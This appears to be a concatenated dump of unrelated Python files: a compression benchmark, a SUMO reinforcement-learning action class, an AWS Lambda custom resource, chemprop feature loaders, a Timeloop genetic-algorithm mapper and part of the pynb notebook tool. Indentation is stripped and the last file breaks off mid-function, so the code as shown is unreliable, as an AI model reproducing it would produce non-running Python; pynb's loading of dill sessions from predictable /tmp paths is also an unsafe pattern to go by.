settings = engine.Settings(WriteOutFiles=False, PrintStatus=False, PrintStats=False)
for file in files:
results = []
for algorithm in algorithms:
try:
print(f"Running {algorithm} on {file.filename}")
results.append(engine.BenchmarkFile(algorithm, file.filename, settings))
except Exception as e:
print("Exception occured: " + str(e))
data.append(CompressionResult(file, results))
# Get best algorithm
for result in data:
best_result = result.best_result()
print(f"{result.file.filename} - {best_result.Ratio} - {best_result.CompressionEngine}")
return data
|
1691141
|
import gym
from typing import Dict
from ding.envs import BaseEnv
from ding.envs.common import EnvElement
ALL_ACTION_TYPE = set(['change'])
class SumoAction(EnvElement):
r"""
Overview:
the action element of Sumo enviroment
Interface:
_init, _from_agent_processor
"""
_name = "SumoAction"
def _init(self, env: BaseEnv, cfg: Dict) -> None:
r"""
Overview:
init the sumo action environment with the given config file
Arguments:
- cfg(:obj:`EasyDict`): config, you can refer to `envs/sumo_wj3_default_config.yaml`
"""
self._env = env
self._cfg = cfg
action_shape = []
self._action_type = cfg.action_type
assert self._action_type in ALL_ACTION_TYPE
self._use_multi_discrete = cfg.use_multi_discrete
for tl, cross in self._env.crosses.items():
if self._action_type == 'change':
action_shape.append(cross.phase_num)
else:
# TODO: add switch action
raise NotImplementedError
if self._use_multi_discrete:
self._shape = len(action_shape)
self._space = gym.spaces.MultiDiscrete(action_shape)
else:
# TODO: add naive discrete action
raise NotImplementedError
self._value = {
'min': 0,
'max': action_shape[0],
'dtype': int,
}
def _from_agent_processor(self, data: Dict) -> Dict:
r"""
"""
# TODO: add switch action
action = {k: {} for k in data.keys()}
for k, v in data.items():
act, last_act = v['action'], v['last_action']
if last_act is not None and act != last_act:
yellow_phase = self._env.crosses[k].get_yellow_phase_index(last_act)
else:
yellow_phase = None
action[k]['yellow'] = yellow_phase
action[k]['green'] = self._env.crosses[k].get_green_phase_index(act)
return action
# override
def _details(self):
return 'action dim: {}'.format(self._shape)
@property
def space(self):
return self._space
|
1691159
|
import json
import csv
import random
import boto3
from botocore.vendored import requests
def lambda_handler(event, context):
try:
# Set user pidx from S3
s3 = boto3.resource('s3')
bucket = s3.Bucket('gamingonaws2018')
obj = bucket.Object(key = 'userList.csv')
response = obj.get()
users = response['Body'].read().split()
# Set DynamoDB
dynamodb = boto3.resource('dynamodb')
table = dynamodb.Table('UserProfile')
uclass = ['warrior', 'mage', 'healer']
if event['RequestType'] == 'Delete':
print 'Send response to CFN.'
send_response(event, context, "SUCCESS", {"Message": "CFN deleted!"})
else:
for user in users:
response = table.put_item(
Item = {
'pidx': int(user),
'ulevel': 1,
'uclass': random.choice(uclass),
'utimestamp': '2000-01-01 00:00:00.000000'
}
)
print 'Send response to CFN.'
send_response(event, context, "SUCCESS", {"Message": "CFN created!"})
print 'End of Lambda function.'
except:
send_response(event, context, "FAILED", {"Message": "Lambda failed!"})
def send_response(event, context, response_status, response_data):
response_body = json.dumps({
"Status": response_status,
"Reason": "See the details in CloudWatch Log Stream: " + context.log_stream_name,
"PhysicalResourceId": context.log_stream_name,
"StackId": event['StackId'],
"RequestId": event['RequestId'],
"LogicalResourceId": event['LogicalResourceId'],
"Data": response_data
})
headers = {
"Content-Type": "",
"Content-Length": str(len(response_body))
}
response = requests.put(event["ResponseURL"], headers = headers, data = response_body)
|
1691201
|
import warnings
from ibllib.misc import logger_config
warnings.filterwarnings('always', category=DeprecationWarning, module='ibllib')
# if this becomes a full-blown library we should let the logging configuration to the discretion of the dev
# who uses the library. However since it can also be provided as an app, the end-users should be provided
# with an useful default logging in standard output without messing with the complex python logging system
# -*- coding:utf-8 -*-
import logging
USE_LOGGING = True
#%(asctime)s,%(msecs)d
if USE_LOGGING:
logger_config(name='ibllib')
else:
# deactivate all log calls for use as a library
logging.getLogger('ibllib').addHandler(logging.NullHandler())
try:
import one
except ModuleNotFoundError:
logging.getLogger('ibllib').error('Missing dependency, please run `pip install ONE-api`')
|
1691217
|
import csv
import os
import pickle
from typing import List
import numpy as np
import pandas as pd
from rdkit import Chem
from rdkit.Chem import PandasTools
def save_features(path: str, features: List[np.ndarray]) -> None:
"""
Saves features to a compressed :code:`.npz` file with array name "features".
:param path: Path to a :code:`.npz` file where the features will be saved.
:param features: A list of 1D numpy arrays containing the features for molecules.
"""
np.savez_compressed(path, features=features)
def load_features(path: str) -> np.ndarray:
"""
Loads features saved in a variety of formats.
Supported formats:
* :code:`.npz` compressed (assumes features are saved with name "features")
* .npy
* :code:`.csv` / :code:`.txt` (assumes comma-separated features with a header and with one line per molecule)
* :code:`.pkl` / :code:`.pckl` / :code:`.pickle` containing a sparse numpy array
.. note::
All formats assume that the SMILES loaded elsewhere in the code are in the same
order as the features loaded here.
:param path: Path to a file containing features.
:return: A 2D numpy array of size :code:`(num_molecules, features_size)` containing the features.
"""
extension = os.path.splitext(path)[1]
if extension == '.npz':
features = np.load(path)['features']
elif extension == '.npy':
features = np.load(path)
elif extension in ['.csv', '.txt']:
with open(path) as f:
reader = csv.reader(f)
next(reader) # skip header
features = np.array([[float(value) for value in row] for row in reader])
elif extension in ['.pkl', '.pckl', '.pickle']:
with open(path, 'rb') as f:
features = np.array([np.squeeze(np.array(feat.todense())) for feat in pickle.load(f)])
else:
raise ValueError(f'Features path extension {extension} not supported.')
return features
def load_valid_atom_features(path: str, smiles: List[str]) -> List[np.ndarray]:
"""
Loads features saved in a variety of formats.
Supported formats:
* :code:`.npz` descriptors are saved as 2D array for each molecule in the order of that in the data.csv
* :code:`.pkl` / :code:`.pckl` / :code:`.pickle` containing a pandas dataframe with smiles as index and numpy array of descriptors as columns
* :code:'.sdf' containing all mol blocks with descriptors as entries
:param path: Path to file containing atomwise features.
:return: A list of 2D array.
"""
extension = os.path.splitext(path)[1]
if extension == '.npz':
container = np.load(path)
features = [container[key] for key in container]
elif extension in ['.pkl', '.pckl', '.pickle']:
features_df = pd.read_pickle(path)
if features_df.iloc[0, 0].ndim == 1:
features = features_df.apply(lambda x: np.stack(x.tolist(), axis=1), axis=1).tolist()
elif features_df.iloc[0, 0].ndim == 2:
features = features_df.apply(lambda x: np.concatenate(x.tolist(), axis=1), axis=1).tolist()
else:
raise ValueError(f'Atom descriptors input {path} format not supported')
elif extension == '.sdf':
features_df = PandasTools.LoadSDF(path).drop(['ID', 'ROMol'], axis=1).set_index('SMILES')
features_df = features_df[~features_df.index.duplicated()]
# locate atomic descriptors columns
features_df = features_df.iloc[:, features_df.iloc[0, :].apply(lambda x: isinstance(x, str) and ',' in x).to_list()]
features_df = features_df.reindex(smiles)
if features_df.isnull().any().any():
raise ValueError('Invalid custom atomic descriptors file, Nan found in data')
features_df = features_df.applymap(lambda x: np.array(x.replace('\r', '').replace('\n', '').split(',')).astype(float))
# Truncate by number of atoms
num_atoms = {x: Chem.MolFromSmiles(x).GetNumAtoms() for x in features_df.index.to_list()}
def truncate_arrays(r):
return r.apply(lambda x: x[:num_atoms[r.name]])
features_df = features_df.apply(lambda x: truncate_arrays(x), axis=1)
features = features_df.apply(lambda x: np.stack(x.tolist(), axis=1), axis=1).tolist()
else:
raise ValueError(f'Extension "{extension}" is not supported.')
return features
|
1691250
|
from __future__ import unicode_literals
import frappe
def execute():
if not frappe.db.exists("Item Group", {'item_group_name': 'WA State Classifications'}):
from erpnext_biotrack.install.after_install import install_fixtures
install_fixtures()
|
1691264
|
import pytest
from pymongo_migrate.generate import slugify
@pytest.mark.parametrize(
"test_input,expected",
[
("My comment", "my_comment"),
("counting: 1, 2, 3", "counting_1_2_3"),
("wat?!", "wat"),
("<NAME>", "may_wik"),
],
)
def test_slugify(test_input, expected):
assert slugify(test_input) == expected
|
1691304
|
import numpy as np
import yaml
import os, sys
import copy
from functools import reduce
import random
from timeloop_env import TimeloopEnv
from multiprocessing.pool import Pool
from multiprocessing import cpu_count
import shutil
from functools import cmp_to_key, partial
class GammaTimeloopEnv(object):
def __init__(self, num_pes=256, l2_size=10800, l1_size=512, fitness_obj=['latency'], report_dir='./report', use_pool=True):
self.fitness_obj = fitness_obj
self.num_pes = num_pes
self.l1_size = l1_size
self.l2_size = l2_size
self.loc_to_dim_note = {0: 'K', 1: 'C', 2: 'Y', 3: 'X', 4: 'R', 5: 'S'}
self.dim_note = ['K', 'C', 'Y', 'X', 'R', 'S']
self.len_dimension = len(self.dim_note)
self.timeloop_configfile_path = './out_config'
self.report_dir = report_dir
self.timeloop_env = TimeloopEnv(config_path=self.timeloop_configfile_path)
self.use_pool = use_pool
def set_dimension(self, dimension):
self.dimension = dimension
self.dimension_dict = self.get_dimension_dict(dimension)
self.dimension_factor = self.get_dimension_factors(self.dimension_dict)
def get_dimension_dict(self, dim_value):
return {note: value for note, value in zip(self.dim_note, dim_value)}
def get_factors(self, n):
return list(reduce(list.__add__,
([i, n // i] for i in range(1, int(n ** 0.5) + 1) if n % i == 0)))
def get_dimension_factors(self, dimension_dict):
dimension_factors = dict()
for key, value in dimension_dict.items():
factors = self.get_factors(value)
dimension_factors[key] = factors
return dimension_factors
def mutate_tiles(self, pops, parents, alpha=0.5, num_mu_loc=1):
len_parents = len(parents)
for i in range(len(pops)):
if random.random() < alpha:
sel_parent = random.randint(0, len_parents - 1)
indv = copy.deepcopy(parents[sel_parent])
l2_tile_size = indv['l2_tile_size']
l1_tile_size = indv['l1_tile_size']
for _ in range(num_mu_loc):
pick_loc = random.randint(0, self.len_dimension - 1)
pick_dim = self.loc_to_dim_note[pick_loc]
dim_value = self.dimension_dict[pick_dim]
factors = self.dimension_factor[pick_dim]
pick_factor_l2 = np.random.choice(factors)
pick_factor_l1 = np.random.choice(self.get_factors(dim_value//pick_factor_l2))
l2_tile_size[pick_loc] = pick_factor_l2
l1_tile_size[pick_loc] = pick_factor_l1
pops[i] = indv
return pops
def mutate_par(self, pops, parents, alpha=0.5):
len_parents = len(parents)
for i in range(len(pops)):
if random.random() < alpha:
sel_parent = random.randint(0, len_parents - 1)
indv = copy.deepcopy(parents[sel_parent])
pick_loc = random.randint(0, 1)
par_dims = indv['par_dims']
par_dims[pick_loc] = np.random.choice(self.dim_note)
pops[i] = indv
return pops
def mutate_order(self, pops, parents, alpha=0.5):
len_parents = len(parents)
for i in range(len(pops)):
if random.random() < alpha:
sel_parent = random.randint(0, len_parents - 1)
indv = copy.deepcopy(parents[sel_parent])
if random.random()<0.5:
pick = 'l2_loop_order'
else:
pick = 'l1_loop_order'
loop_order = indv[pick]
loop_order = list(loop_order)
idxs = random.sample(set(np.arange(0, self.len_dimension)), 2)
loop_order[idxs[0]], loop_order[idxs[1]] = loop_order[idxs[1]], loop_order[idxs[0]]
indv[pick] = ''.join(loop_order)
pops[i] = indv
return pops
def init_indv(self):
indv = {'l2_tile_size': [1]*6,
'l1_tile_size': [1]*6,
'l2_loop_order': 'KCYXRS',
'l1_loop_order': 'KCYXRS',
'par_dims': ['K', 'C']}
return indv
def init_pops(self, num_pops):
# return [self.init_indv() for _ in range(num_pops)], np.random.randint(0, 100, (num_pops, len(self.fitness_obj)))
return [self.init_indv() for _ in range(num_pops)], np.ones((num_pops, len(self.fitness_obj))) * np.NINF
def sort_rank_func(self, cand1, cand2, delta=1e-2):
def helper(item1, item2, is_last=False):
margin = abs((item1+item2) /2 * delta) if not is_last else 0
if margin == float('Inf'):
margin = 0
if item1 >= item2 + margin:
return 1
elif item1 +margin < item2:
return -1
else:
return 0
fitness_len = len(cand1) - 1
for i in range(fitness_len):
ret = helper(cand1[i], cand2[i], is_last=(i==fitness_len-1))
if ret != 0:
return ret
def select_parents(self, pops, fitness, num_parents, num_elites, num_pops, use_soft_margin=True):
fitness_list = [tuple(list(ar)+[-i]) for i, ar in enumerate(fitness)]
if not use_soft_margin:
sort_rank_func = partial(self.sort_rank_func, delta=0)
else:
sort_rank_func = self.sort_rank_func
fitness_list = sorted(fitness_list, key=cmp_to_key(sort_rank_func), reverse=True)
idx = [int(-ar[-1]) for ar in fitness_list]
new_pop = [pops[i] for i in idx][:num_pops]
new_fitness = fitness[idx][:num_pops]
parents = copy.deepcopy(new_pop[:num_parents])
elites = copy.deepcopy(new_pop[:num_elites])
elites_fitness = copy.deepcopy(new_fitness[:num_elites])
return new_pop, new_fitness, parents, elites, elites_fitness
def thread_fun(self, indv, pool_idx=0):
self.timeloop_env.create_timeloop_config(self.dimension, self.l2_size, self.l1_size, self.num_pes,
indv['l2_tile_size'], indv['l1_tile_size'], indv['l2_loop_order'],
indv['l1_loop_order'], indv['par_dims'], pool_idx=pool_idx)
fit = self.timeloop_env.run_timeloop(pool_idx=pool_idx, fitness_obj=self.fitness_obj)
return fit
def evaluate(self, pops, fitness, pool=None):
if not pool:
for i, indv in enumerate(pops):
fitness[i] = self.thread_fun(indv)
else:
rets = pool.starmap(self.thread_fun, zip(pops, np.arange(len(pops))))
fitness = np.array(rets)
return fitness
def create_timeloop_report(self, indv, dir_path='./report'):
fitness = self.thread_fun(indv, pool_idx=0)
os.makedirs(dir_path, exist_ok=True)
os.system(f'cp -d -r {os.path.join(self.timeloop_configfile_path, "pool-0")}/* {dir_path}')
with open(os.path.join(dir_path,'Gamma-Timeloop.txt'), 'w') as fd:
fd.write(f'Achieved Fitness: {fitness}')
fd.write(f'GammaTimeloop-style Sol: {self.get_genome(indv)}')
fd.write(f'Gamma-style Sol: {self.get_maestro_style_genome(indv)}')
def run(self, dimension, num_pops=100, num_gens=100, elite_ratio=0.05, parents_ratio=0.4):
self.set_dimension(dimension)
num_parents = int(num_pops*parents_ratio)
num_elites = max(1, int(num_pops*elite_ratio))
pops, fitness = self.init_pops(num_pops)
if self.use_pool:
pool = Pool(num_pops)
self.timeloop_env.create_pool_env(num_pops)
else:
pool = None
for g in range(num_gens):
if g == 0:
pops, fitness, parents, elites, elites_fitness = self.select_parents(pops, fitness, num_parents, num_elites, num_pops)
if g == 0:
alpha = 1
else:
alpha = 0.5
pops = self.mutate_par(pops, parents, alpha=alpha)
pops = self.mutate_order(pops, parents, alpha=alpha)
pops = self.mutate_tiles(pops, parents, alpha=alpha)
fitness = self.evaluate(pops, fitness, pool)
pops = elites + pops
fitness = np.concatenate((elites_fitness, fitness), axis=0)
pops, fitness, parents, elites, elites_fitness = self.select_parents(pops, fitness, num_parents, num_elites, num_pops)
best_idx = 0
best_sol = pops[best_idx]
print(f'[Gen{g}] fitness: {fitness[best_idx]} Sol: {self.get_genome(best_sol)}')
print(f'Achieved Fitness: {fitness[best_idx]}')
print(f'GammaTimeloop-style Sol: {self.get_genome(best_sol)}')
print(f'Gamma-style Sol: {self.get_maestro_style_genome(best_sol)}')
self.create_timeloop_report(best_sol, dir_path=self.report_dir)
self.clean_timeloop_output_files()
def get_genome(self, indv):
l2_tile_size, l1_tile_size = indv['l2_tile_size'], indv['l1_tile_size']
l2_loop_order, l1_loop_order = indv['l2_loop_order'],indv['l1_loop_order']
l2_par, l1_par = indv['par_dims']
l2_tile_dict = self.get_dimension_dict(l2_tile_size)
l1_tile_dict = self.get_dimension_dict(l1_tile_size)
genome_l2 = [[l2_par, self.num_pes]] + [[d, l2_tile_dict[d]] for d in l2_loop_order]
genome_l1 = [[l1_par, 1]] + [[d, l1_tile_dict[d]] for d in l1_loop_order]
genome = genome_l2 + genome_l1
return genome
def get_maestro_style_genome(self, indv):
l2_tile_size, l1_tile_size = indv['l2_tile_size'], indv['l1_tile_size']
l2_tile_size = [l2 * l1 for l2, l1 in zip(l2_tile_size, l1_tile_size)]
l2_loop_order, l1_loop_order = indv['l2_loop_order'],indv['l1_loop_order']
l2_par, l1_par = indv['par_dims']
l2_tile_dict = self.get_dimension_dict(l2_tile_size)
l1_tile_dict = self.get_dimension_dict(l1_tile_size)
l1_cluster_size = l1_tile_dict[l1_par]
l1_tile_dict[l1_par] = 1
l2_cluster_size = self.num_pes // l1_cluster_size
l2_tile_dict[l2_par] = max(1, l2_tile_dict[l2_par] // l2_cluster_size)
genome_l2 = [[l2_par, self.num_pes]] + [[d, l2_tile_dict[d]] for d in l2_loop_order]
genome_l1 = [[l1_par, l1_cluster_size]] + [[d, l1_tile_dict[d]] for d in l1_loop_order]
genome = genome_l2 + genome_l1
return genome
def clean_timeloop_output_files(self):
# out_prefix = "./timeloop-model."
# output_file_names = []
# output_file_names.append(out_prefix + "accelergy.log")
# output_file_names.append(out_prefix + ".log")
# output_file_names.append(out_prefix + "ART.yaml")
# output_file_names.append(out_prefix + "ART_summary.yaml")
# output_file_names.append(out_prefix + "ERT.yaml")
# output_file_names.append(out_prefix + "ERT_summary.yaml")
# output_file_names.append(out_prefix + "flattened_architecture.yaml")
# output_file_names.append(out_prefix + "map+stats.xml")
# output_file_names.append(out_prefix + "map.txt")
# output_file_names.append(out_prefix + "stats.txt")
# for f in output_file_names:
# if os.path.exists(f):
# os.remove(f)
shutil.rmtree(self.timeloop_configfile_path)
|
1691317
|
import argparse
import codecs
import datetime
import hashlib
import inspect
import logging
import os
import sys
import time
import traceback
import warnings
import dill
import nbformat as nbf
from jupyter_client.kernelspec import KernelSpecManager
from nbconvert import HTMLExporter
from nbconvert.preprocessors import ExecutePreprocessor
from nbconvert.preprocessors.execute import CellExecutionError
from pynb.utils import get_func, fatal, check_isfile
from pynb.version import __version__
logging.basicConfig(level=logging.INFO)
class CachedExecutePreprocessor(ExecutePreprocessor):
"""
Extends .run_cell to support cached execution of cells
"""
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.cache_valid = True
self.prev_fname_session = None
self.prev_fname_session_loaded = None
self.disable_cache = False
self.ignore_cache = False
self.uid = None
def cell_hash(self, cell, cell_index):
"""
Compute cell hash based on cell index and cell content
:param cell: cell to be hashed
:param cell_index: cell index
:return: hash string
"""
s = '{uid} {cell} {index}'.format(uid=self.uid,
cell=str(cell.source),
index=cell_index).encode('utf-8')
hash = hashlib.sha1(s).hexdigest()[:8]
return hash
def run_cell(self, cell, cell_index=0, store_history=True):
"""
Run cell with caching
:param cell: cell to run
:param cell_index: cell index (optional)
:param store_history: ignored but required because expected from Jupyter executor (optional)
:return:
"""
hash = self.cell_hash(cell, cell_index)
fname_session = '/tmp/pynb-cache-{}-session.dill'.format(hash)
fname_value = '/tmp/pynb-cache-{}-value.dill'.format(hash)
cell_snippet = str(" ".join(cell.source.split())).strip()[:40]
if self.disable_cache:
logging.info('Cell {}: Running: "{}.."'.format(hash, cell_snippet))
return super().run_cell(cell, cell_index)
if not self.ignore_cache:
if self.cache_valid and os.path.isfile(fname_session) and os.path.isfile(fname_value):
logging.info('Cell {}: Loading: "{}.."'.format(hash, cell_snippet))
self.prev_fname_session = fname_session
with open(fname_value, 'rb') as f:
value = dill.load(f)
return value
# If cache does not exist or not valid:
#
# 1) Invalidate subsequent cell caches
# 2) Load session from previous cached cell (if existing)
# 3) Run cell
# 4) Cache cell session
# 5) Cache cell value
logging.info('Cell {}: Running: "{}.."'.format(hash, cell_snippet))
# 1) Invalidate subsequent cell caches
self.cache_valid = False
# 2) Load session from previous cached cell (if existing and required)
if self.prev_fname_session:
if self.prev_fname_session_loaded != self.prev_fname_session:
self.session_load(hash, self.prev_fname_session)
# 2) Run cell
value = super().run_cell(cell, cell_index)
# We make sure that injected cells do not interfere with the cell index...
# value[0]['content']['execution_count'] = cell_index
# 3) Cache cell session
cached = self.session_dump(cell, hash, fname_session)
# 4) Cache cell value, if no errors while dumping the cell session in 3).
if cached:
self.prev_fname_session_loaded = fname_session
self.prev_fname_session = fname_session
logging.debug('Cell {}: dumping value to {}'.format(hash, fname_value))
with open(fname_value, 'wb') as f:
dill.dump(value, f)
logging.debug('Cell {}: cached'.format(hash))
return value
def session_load(self, hash, fname_session):
"""
Load ipython session from file
:param hash: cell hash
:param fname_session: pathname to dumped session
:return:
"""
logging.debug('Cell {}: loading session from {}'.format(hash, fname_session))
# 'dill.settings["recurse"] = True',
# 'dill.settings["byref"] = True',
inject_code = ['import dill',
'dill.load_session(filename="{}")'.format(fname_session),
]
inject_cell = nbf.v4.new_code_cell('\n'.join(inject_code))
super().run_cell(inject_cell)
def session_dump(self, cell, hash, fname_session):
"""
Dump ipython session to file
:param hash: cell hash
:param fname_session: output filename
:return:
"""
logging.debug('Cell {}: Dumping session to {}'.format(hash, fname_session))
inject_code = ['import dill',
'dill.dump_session(filename="{}")'.format(fname_session),
]
inject_cell = nbf.v4.new_code_cell('\n'.join(inject_code))
reply, outputs = super().run_cell(inject_cell)
errors = list(filter(lambda out: out.output_type == 'error', outputs))
if len(errors):
logging.info('Cell {}: Warning: serialization failed, cache disabled'.format(hash))
logging.debug(
'Cell {}: Serialization error: {}'.format(hash, CellExecutionError.from_cell_and_msg(cell, errors[0])))
# disable attempts to retrieve cache for subsequent cells
self.disable_cache = True
# remove partial cache for current cell
os.remove(fname_session)
return False
return True
# fname_session has been created in the filesystem of the system running the kernel,
# which is the same of the system that is managing the execution of the notebook.
class Notebook:
"""
Manage Jupyter notebook as Python class/application.
"""
def __init__(self):
"""
Initialize notebook.
"""
self.long_name = 'pynb v{} running {} on Python v{}.{}.{}'.format(__version__, self.__class__.__name__,
*sys.version_info[:3])
self.parser = argparse.ArgumentParser(description=self.long_name)
self.nb = nbf.v4.new_notebook()
self.nb['cells'] = []
self.cells_name = None
self.args = None
def add(self, func, **kwargs):
"""
Parse func's function source code as Python and Markdown cells.
:param func: Python function to parse
:param kwargs: variables to inject as first Python cell
:return:
"""
params = set(kwargs.keys())
func_params = set(inspect.getargspec(func).args)
# ignore self, which is present when extending Notebook.
if 'self' in func_params:
func_params.remove('self')
if params != func_params:
fatal('Params {} not matching cells function params {}'.format(list(params), list(func_params)))
lines = inspect.getsourcelines(func)[0][1:]
buffer = ""
indent_count = None
inside_markdown = False
return_found = False
for line in lines:
# remove base indentation of function 'func'
if len(line.strip()) > 0:
if not indent_count:
indent_count = 0
for c in line:
if c not in [' ', '\t']:
break
else:
indent_count += 1
line = line[indent_count:]
if not inside_markdown and line.strip() == "return":
logging.info('Encountered "return" statement, ignoring the rest of the notebook.')
break
if line.strip() == "'''": # if md block begin/end, or new cell...
if len(buffer.strip()) > 0:
if not inside_markdown: # if md block begin: new markdown block! flush buffer
self.add_cell_code(buffer)
else: # if md block end: markdown block completed! flush buffer
self.add_cell_markdown(buffer)
buffer = ""
inside_markdown = not inside_markdown
else:
buffer += line
if len(buffer.strip()) > 0:
if not inside_markdown:
self.add_cell_code(buffer)
else:
self.add_cell_markdown(buffer)
if len(kwargs) > 0:
# We have parameters to inject into the notebook.
# If the first cell is Markdown, assume that is the title and
# insert parameters as 2nd cell. Otherwise, as 1st cell.
if len(self.nb['cells']) > 0 and self.nb['cells'][0].cell_type == 'markdown':
self.add_cell_params(kwargs, 1)
else:
self.add_cell_params(kwargs, 0)
def add_cell_params(self, params, pos=None):
"""
Add cell of Python parameters
:param params: parameters to add
:return:
"""
self.params = params
cell_str = '# Parameters:\n'
for k, v in params.items():
cell_str += "{} = {}\n".format(k, repr(v))
self.add_cell_code(cell_str, pos)
def add_cell_footer(self):
"""
Add footer cell
"""
# check if there's already a cell footer... if true, do not add a second cell footer.
# this situation happens when exporting to ipynb and then importing from ipynb.
logging.info('Adding footer cell')
for cell in self.nb['cells']:
if cell.cell_type == 'markdown':
if 'pynb_footer_tag' in cell.source:
logging.debug('Footer cell already present')
return
m = """
---
* **Notebook class name**: {class_name}
* **Notebook cells name**: {cells_name}
* **Execution time**: {exec_begin}
* **Execution duration**: {exec_time:.2f}s
* **Command line**: {argv}
[//]: # (pynb_footer_tag)
"""
self.add_cell_markdown(
m.format(exec_time=self.exec_time, exec_begin=self.exec_begin_dt, class_name=self.__class__.__name__,
argv=str(sys.argv), cells_name=self.cells_name))
def add_cell_markdown(self, cell_str):
"""
Add a markdown cell
:param cell_str: markdown text
:return:
"""
logging.debug("add_cell_markdown: {}".format(cell_str))
# drop spaces and taps at beginning and end of all lines
# cell = '\n'.join(map(lambda x: x.strip(), cell_str.split('\n')))
cell = '\n'.join(cell_str.split('\n'))
cell = nbf.v4.new_markdown_cell(cell)
self.nb['cells'].append(cell)
def add_cell_code(self, cell_str, pos=None):
"""
Add Python cell
:param cell_str: cell content
:return:
"""
cell_str = cell_str.strip()
logging.debug("add_cell_code: {}".format(cell_str))
cell = nbf.v4.new_code_cell(cell_str)
if pos is None:
self.nb['cells'].append(cell)
else:
self.nb['cells'].insert(pos, cell)
def process(self, uid, add_footer=False, no_exec=False, disable_cache=False, ignore_cache=False):
"""
Execute notebook
:return: self
"""
self.exec_begin = time.perf_counter()
self.exec_begin_dt = datetime.datetime.now()
ep = CachedExecutePreprocessor(timeout=None, kernel_name='python3')
ep.disable_cache = disable_cache
ep.ignore_cache = ignore_cache
ep.uid = uid
# Execute the notebook
if not no_exec:
with warnings.catch_warnings():
# On MacOS, annoying warning "RuntimeWarning: Failed to set sticky bit on"
# Let's suppress it.
warnings.simplefilter("ignore")
ep.preprocess(self.nb, {'metadata': {'path': '.'}})
self.exec_time = time.perf_counter() - self.exec_begin
if add_footer:
self.add_cell_footer()
if not no_exec:
logging.info('Execution time: {0:.2f}s'.format(self.exec_time))
return self
def export_ipynb(self, pathname):
"""
Export notebook to .ipynb file
:param pathname: output filename
:return:
"""
if pathname == '-':
nbf.write(self.nb, sys.__stdout__)
else:
with codecs.open(pathname, 'w', encoding='utf-8') as f:
ret = nbf.write(self.nb, f)
pass
logging.info("Jupyter notebook exported to '{}'".format(pathname))
def export_html(self, pathname):
"""
Export notebook to .html file
:param pathname: output filename
:return:
"""
html_exporter = HTMLExporter()
(body, resources) = html_exporter.from_notebook_node(self.nb)
if pathname == '-':
sys.__stdout__.write(body)
else:
with open(pathname, 'w') as f:
f.write(body)
logging.info("HTML notebook exported to '{}'".format(pathname))
def export_pynb_str(self):
s = 'def cells():\n'
for cell in self.nb['cells']:
if cell.cell_type == 'markdown':
s += " '''\n"
for line in cell.source.splitlines():
s += ' {}\n'.format(line)
s += " '''\n"
elif cell.cell_type == 'code':
for line in cell.source.splitlines():
s += ' {}\n'.format(line)
else:
raise Exception('Unknown cell type: {}'.format(cell.cell_type))
s += "\n '''\n '''\n\n"
return s
def export_pynb(self, pathname):
s = self.export_pynb_str()
if pathname == '-':
sys.__stdout__.write(s)
else:
with open(pathname, 'w') as f:
f.write(s)
logging.info("Python notebook exported to '{}'".format(pathname))
def add_argument(self, *args, **kwargs):
"""
Add application argument
:param args: see parser.add_argument
:param kwargs: see parser.add_argument
:return:
"""
self.parser.add_argument(*args, **kwargs)
def cells(self, *args, **kwargs):
pass
def set_cells(self, cells_location):
"""
Set self.cells to function :cells in file pathname.py
:param cells_location: cells location, format 'pathname.py:cells'
:return:
"""
if ':' in cells_location:
pathname, func_name = cells_location.split(':')
else:
pathname = cells_location
func_name = 'cells'
check_isfile(pathname)
try:
self.cells = get_func(func_name, pathname)
except SyntaxError as e:
fatal(traceback.format_exc(limit=1))
return pathname, func_name
def parse_args(self, **kwargs):
"""
Parse arguments
:param kwargs: optional params
:return:
"""
self.parser.add_argument('cells', help='path to cells function. Format: PATHNAME.PY[:FUNCTION_NAME]', nargs='?')
self.parser.add_argument('--disable-cache', action="store_true", default=False, help='disable execution cache')
self.parser.add_argument('--ignore-cache', action="store_true", default=False, help='ignore existing cache')
self.parser.add_argument('--no-exec', action="store_true", default=False, help='do not execute notebook')
self.parser.add_argument('--param', action='append', help='notebook parameter. Format: NAME=VALUE')
self.add_argument('--import-ipynb', help='import from Jupyter notebook')
self.add_argument('--export-html', help='export to HTML format')
self.add_argument('--export-ipynb', help='export to Jupyter notebook')
self.add_argument('--export-pynb', help='export to Python notebook')
self.add_argument('--kernel', default=None, help='set kernel')
self.add_argument('--log-level', help='set log level')
self.add_argument('--check-syntax', action="store_true", default=False, help='check Python syntax')
self.add_argument('--disable-footer', action="store_true", default=False,
help='do not append Markdown footer to Jupyter notebook')
if len(sys.argv) == 1 and self.__class__ == Notebook:
# no parameters and Notebook class not extended:
# print help and exit.
self.parser.print_help()
print()
sys.exit(1)
self.args = self.parser.parse_args()
def load_cells_params(self):
if self.args.cells:
# module and function name passed with args.cells parameter
pathname, func_name = self.set_cells(self.args.cells)
logging.info('Loading cells from {}'.format(self.args.cells))
uid = '{}:{}'.format(os.path.abspath(pathname), func_name)
self.cells_name = self.args.cells
else:
# Notebook class extended, .cells method contains the target cell
# Let's make sure that this is the case...
if self.__class__ == Notebook:
fatal('Notebook class not extended and cells parameter is missing')
logging.info('Loading notebook {}'.format(self.__class__.__name__))
uid = '{}:{}'.format(os.path.abspath(inspect.getfile(self.__class__)), self.__class__.__name__)
# Process parameters passed by custom arguments
arg_spec = inspect.getargspec(self.cells)
func_params = arg_spec.args
# Get default parameters
default_params = arg_spec.defaults
self.kwargs = {}
if default_params:
default_args_with_value = dict(zip(func_params[-len(default_params):], default_params))
logging.debug('Found default values {}'.format(default_args_with_value))
# Add default values to kwargs
self.kwargs.update(default_args_with_value)
if not self.args.cells:
# self is always present in case of subclassed Notebook, since cells(self, ...) is a method.
func_params.remove('self')
for param in func_params:
self.kwargs[param] = getattr(self.args, param, None)
# Process parameters passed with --param
if self.args.param:
for param in self.args.param:
k, v = param.split('=', 1)
self.kwargs[k] = v
# Check parameters completeness
for param in func_params:
if self.kwargs[param] is None:
fatal('Notebook parameter {} required but not found'.format(param))
logging.info('Parameters: {}'.format(self.kwargs))
self.add(self.cells, **self.kwargs)
return uid
def get_kernelspec(self, name):
"""Get a kernel specification dictionary given a kernel name
"""
ksm = KernelSpecManager()
kernelspec = ksm.get_kernel_spec(name).to_dict()
kernelspec['name'] = name
kernelspec.pop('argv')
return kernelspec
def set_kernel(self, name):
kernelspec = self.get_kernelspec(name)
metadata = {'language': 'python',
'kernelspec': kernelspec}
self.nb.update(metadata=metadata)
def run(self):
"""
Run notebook as an application
:param params: parameters to inject in the notebook
:return:
"""
if not self.args:
self.parse_args()
if self.args.log_level:
